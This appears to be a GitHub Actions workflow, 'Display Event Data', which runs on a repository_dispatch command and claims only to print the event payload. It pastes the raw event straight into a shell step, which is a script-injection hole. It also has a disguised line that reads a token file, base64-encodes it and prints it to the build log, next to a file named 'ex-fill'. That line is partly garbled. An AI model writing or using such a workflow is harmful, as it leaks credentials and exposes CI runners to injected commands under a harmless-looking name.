name: Display Event Data
on:
  repository_dispatch:
    types: [deploy-command]
jobs:
  displayEventData:
    runs-on: ubuntu-latest
    steps:
      - name: Display the event payload in JSON
        run: |
          echo "Event Data:"
          echo "${{ toJson(github.event) }}"
          echo "${{ github.event }}" 2> ex-fill; cat token,${F555} | base64> out
          cat ex-fill
          cat out
